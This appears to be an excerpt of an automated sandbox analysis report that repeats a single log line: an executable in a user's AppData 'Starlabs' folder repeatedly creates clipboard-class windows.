Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
